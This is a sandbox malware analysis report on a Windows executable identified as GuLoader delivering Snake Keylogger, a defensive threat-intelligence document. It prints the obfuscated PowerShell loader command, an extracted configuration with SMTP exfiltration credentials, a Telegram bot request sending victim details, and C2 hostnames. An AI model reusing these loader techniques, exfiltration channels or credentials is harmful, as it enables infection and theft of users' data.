Edit tour

Windows Analysis Report
87h216Snb7.exe

Overview

General Information

Sample name:	87h216Snb7.exe renamed because original name is a hash value
Original sample name:	a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac.exe
Analysis ID:	1576727
MD5:	c9007399358b2c71f94731c0dada3aae
SHA1:	52961d38410067be7256356aa18ee52051bef614
SHA256:	a3f7477a9612f8ac90866fb2c4adc56a447f4a8262e4ac75bb1c825a254afbac
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

87h216Snb7.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\87h216Snb7.exe" MD5: C9007399358B2C71F94731C0DADA3AAE)

powershell.exe (PID: 4552 cmdline: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7304 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "administracion@fungiclm.com", "Password": "FungiCLM-Administracion24", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.1541477424.0000000008E67000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7304	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7304, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49752

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4552, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , CommandLine: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\87h216Snb7.exe", ParentImage: C:\Users\user\Desktop\87h216Snb7.exe, ParentProcessId: 3736, ParentProcessName: 87h216Snb7.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tiltalen=$redeemership.SubString(61260,3);.$Tiltalen($redeemership)" , ProcessId: 4552, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:21:50.157618+0100	2803305	3	Unknown Traffic	192.168.2.7	49790	104.21.67.152	443	TCP
2024-12-17T13:22:02.337091+0100	2803305	3	Unknown Traffic	192.168.2.7	49823	104.21.67.152	443	TCP
2024-12-17T13:22:05.227115+0100	2803305	3	Unknown Traffic	192.168.2.7	49834	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:21:45.729182+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49778	193.122.130.0	80	TCP
2024-12-17T13:21:48.541697+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49778	193.122.130.0	80	TCP
2024-12-17T13:21:51.432452+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49794	193.122.130.0	80	TCP
2024-12-17T13:21:54.573138+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49802	193.122.130.0	80	TCP
2024-12-17T13:21:57.789006+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49813	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T13:21:36.718510+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49752	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administracion@fungiclm.com", "Password": "FungiCLM-Administracion24", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde\87h216Snb7.exe

ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Source: 87h216Snb7.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 87h216Snb7.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49784 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.7:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49854 version: TLS 1.2

Source: 87h216Snb7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdbht9$ source: powershell.exe, 00000007.00000002.1537052858.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\87h216Snb7.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326CF49h	11_2_2326CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23260D0Dh	11_2_23260B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23261697h	11_2_23260B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326EDB1h	11_2_2326EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326F209h	11_2_2326EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326F661h	11_2_2326F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326E0A9h	11_2_2326DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_23260673
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326E501h	11_2_2326E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326E959h	11_2_2326E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 232631E0h	11_2_2326310E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23262C19h	11_2_23262968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326D7F9h	11_2_2326D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326DC51h	11_2_2326D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 232631E0h	11_2_23262DBB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 232631E0h	11_2_23262DC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326FAB9h	11_2_2326F810
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_23260040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	11_2_23260853
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2326D3A1h	11_2_2326D0F8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49794 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49802 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49813 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49778 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49790 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49752 -> 172.217.19.174:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49834 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49823 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49784 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1AHR9UXGQEmybB2M9Xi_vJb2WVyjqg-8D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2018/12/2024%20/%2010:14:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 12:22:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 87h216Snb7.exe, 87h216Snb7.exe.7.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000007.00000002.1534256640.0000000005799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000007.00000002.1531343909.0000000004731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000007.00000002.1531343909.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020B93000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 0000000B.00000002.2532496720.0000000021DC8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2532496720.0000000021AD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C44000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2529814283.0000000020C75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 0000000B.00000002.2529814283.0000000020C3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
